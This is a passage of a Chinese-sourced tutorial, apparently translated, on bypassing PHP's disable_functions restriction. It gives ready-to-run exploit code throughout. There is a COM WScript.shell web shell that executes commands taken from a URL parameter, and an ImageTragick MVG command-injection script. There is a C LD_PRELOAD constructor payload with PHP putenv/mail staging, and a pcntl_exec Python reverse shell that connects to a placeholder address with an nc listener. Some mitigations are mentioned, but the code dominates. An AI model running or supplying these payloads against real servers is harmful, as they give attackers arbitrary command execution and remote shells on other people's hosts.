php bypass disable_functions (Part 2)

Continued from Part 1.

COM component

Official description:

Now, why would or should you use COM? COM is one of the main ways to glue applications and components together on the Windows platform; using COM you can launch Microsoft Word, fill in a document template and save the result as a Word document and send it to a visitor of your web site. You can also use COM to perform administrative tasks for your network and to configure your IIS; these are just the most common uses; you can do much more with COM.
If it is enabled, phpinfo() shows `COM_support = enabled` under the `com_dotnet` section. COM is Windows-only: since PHP 5.4.5 it is a separate extension that has to be loaded with `extension=php_com_dotnet.dll`, and because the bypass goes through a class rather than a function, it can be blocked independently of disable_functions by listing COM in `disable_classes`.

Exploit code:

<?php
$command = $_GET['a'];
$wsh = new COM('WScript.shell'); // instantiate a COM object; Shell.Application works too
$exec = $wsh->exec("cmd /c " . $command); // call the object's method to run the command
$stdout = $exec->StdOut(); // the WshScriptExec object exposes the child's stdout stream
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>

ImageMagick

Official description:

Imagick is the official PHP extension for creating and modifying images through the ImageMagick API.

ImageMagick® is a suite of components for creating, editing and composing bitmap images. It can read, convert and write images in many different formats, including DPX, EXR, GIF, JPEG, JPEG-2000, PDF, PhotoCD, PNG, PostScript, SVG and TIFF.

Affected versions: ImageMagick up to and including 6.9.3-9 (fixed in 6.9.3-10 and 7.0.1-1; CVE-2016-3714, "ImageTragick"). The injected command is executed by the ImageMagick library itself while it handles the delegate for the URL in the image, not by any PHP function, which is why disable_functions has no effect on it. The standard mitigation, independent of the PHP side, is to disable the MVG, MSL, EPHEMERAL, HTTPS and related coders in ImageMagick's policy.xml.

Install the extension:

sudo apt-get install php5.6-imagick

After installation the imagick settings show up in phpinfo().

Exploit code:

<?php
echo "Disable Functions: " . ini_get('disable_functions') . "\n";

// Take the command from argv on the CLI or from ?cmd= over HTTP; default to id
$command = PHP_SAPI == 'cli' ? $argv[1] : $_GET['cmd'];
if ($command == '') {
    $command = 'id';
}

// MVG vector file: the fill URL is handed to the https delegate without escaping,
// so the closing quote and "|$command" are interpreted by the shell (CVE-2016-3714)
$exploit = <<<EOF
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|$command")'
pop graphic-context
EOF;

file_put_contents("KKKK.mvg", $exploit);
$thumb = new Imagick();
$thumb->readImage('KKKK.mvg'); // parsing the MVG triggers the delegate and with it the injected command
$thumb->writeImage('KKKK.png');
$thumb->clear();
$thumb->destroy();
unlink("KKKK.mvg");
unlink("KKKK.png");
?>

LD_PRELOAD

LD_PRELOAD is an environment variable on Linux that lets you name shared libraries the dynamic linker must load before any others when a program starts.

Suppose system() lives in the system shared object a.so. The idea is to get an attacker-controlled evil.so loaded ahead of a.so: if evil.so exports a function with the same name as system(), the dynamic linker resolves the symbol to evil.so first, so the process ends up calling evil.so's system(). In practice the payload does not even need to shadow a particular symbol: a function marked __attribute__((constructor)) in evil.so runs as soon as the library is mapped, whatever the host program calls afterwards.

This method requires mail() and putenv(): putenv() sets LD_PRELOAD in the PHP process's environment, and mail() makes PHP start a new process (sendmail, via sendmail_path) that inherits that environment and therefore loads the library. It also needs a sendmail binary to actually exist on the host, otherwise no new process is ever started. error_log() with message type 1 goes through the same sendmail path and can stand in for mail() if only mail() is disabled.

Using the ready-made PoC (the bypass_disablefunc_via_LD_PRELOAD project linked under References), system commands can be executed directly: cmd is the command to run, outpath the file its output is written to and read back from, and sopath the absolute path of the uploaded .so, for example:

http://127.0.0.1/bypass_disablefunc.php?cmd=ls%20/&outpath=/tmp/aa&sopath=/var/www/html/bypass_disablefunc_x64.so
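As an added example (not code from this page or from the linked project), here is a minimal shared object of the kind the LD_PRELOAD method relies on. Rather than shadowing a specific symbol, it uses a constructor, which the dynamic linker runs as soon as the library is mapped into the spawned sendmail process. The command and output path come from environment variables whose names (BYPASS_CMD, BYPASS_OUT) are this example's own choice; they are staged from PHP with putenv() before calling mail(), as the comment at the top shows.

```c
/*
 * Minimal LD_PRELOAD payload (added example; the variable names and paths
 * are assumptions, not the linked project's). Build it on the target's
 * architecture and libc, then upload it:
 *
 *   gcc -shared -fPIC -o bypass.so bypass.c
 *
 * PHP side, the only calls needed: putenv() to stage the environment and
 * mail() to spawn sendmail, which inherits LD_PRELOAD and loads this file:
 *
 *   putenv("BYPASS_CMD=id");
 *   putenv("BYPASS_OUT=/tmp/bypass.out");
 *   putenv("LD_PRELOAD=/var/www/html/bypass.so");
 *   mail("a@localhost", "", "", "");
 *   echo file_get_contents("/tmp/bypass.out");
 */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define CMD_ENV "BYPASS_CMD"   /* command to run (assumed name) */
#define OUT_ENV "BYPASS_OUT"   /* file that receives its output (assumed name) */

/* Build "<cmd> > <outpath> 2>&1" into buf so that both stdout and stderr of
 * the command land in a file PHP can read back. Returns 0 on success, -1 if
 * an input is missing or the line does not fit. */
int build_redirected_command(const char *cmd, const char *outpath,
                             char *buf, size_t buflen)
{
    if (cmd == NULL || outpath == NULL || buf == NULL || buflen == 0)
        return -1;
    int n = snprintf(buf, buflen, "%s > %s 2>&1", cmd, outpath);
    if (n < 0 || (size_t)n >= buflen)
        return -1;
    return 0;
}

/* Runs when the dynamic linker loads this object into any process, before
 * that program's main(); no symbol of the host program has to be hooked. */
__attribute__((constructor))
static void preload_entry(void)
{
    char line[4096];
    const char *cmd = getenv(CMD_ENV);
    const char *out = getenv(OUT_ENV);

    /* Drop LD_PRELOAD first: system() starts /bin/sh, which would otherwise
     * load this library again and re-run the constructor recursively. */
    unsetenv("LD_PRELOAD");

    /* Stay silent in processes that were not staged from PHP. */
    if (build_redirected_command(cmd, out, line, sizeof line) != 0)
        return;

    system(line);
}
```

The library has to match the target's architecture and libc, and the web server user must be able to read it at the path given in LD_PRELOAD; if sendmail is missing from the host, mail() never forks and the constructor never runs.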

pcntl_exec

This method requires pcntl_exec(). Check phpinfo() first: distribution php.ini files for the web SAPIs (Debian and Ubuntu, for example) list the pcntl_* functions in disable_functions by default, and the PHP manual itself advises against enabling pcntl under a web server. pcntl_exec() replaces the PHP worker's process image with the target program, so the request never returns; the reverse shell is the only channel back.

First, start a listener locally:

nc -lvvp 1234

Exploit code for a reverse shell (replace xx.xx.xx.xx with the listener's address; on hosts without a python2 binary, point it at /usr/bin/python3 instead):

<?php
// pcntl_exec() replaces the current PHP process with python, which connects back to the listener
// and wires the socket to stdin/stdout/stderr of an interactive bash
pcntl_exec("/usr/bin/python", array(
    '-c',
    'import socket,subprocess,os;' .
    's=socket.socket(socket.AF_INET,socket.SOCK_STREAM,socket.SOL_TCP);' .
    's.connect(("xx.xx.xx.xx",1234));' .
    'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);' .
    'p=subprocess.call(["/bin/bash","-i"]);'
));
?>

References:

https://xz.aliyun.com/t/5320#toc-2

https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD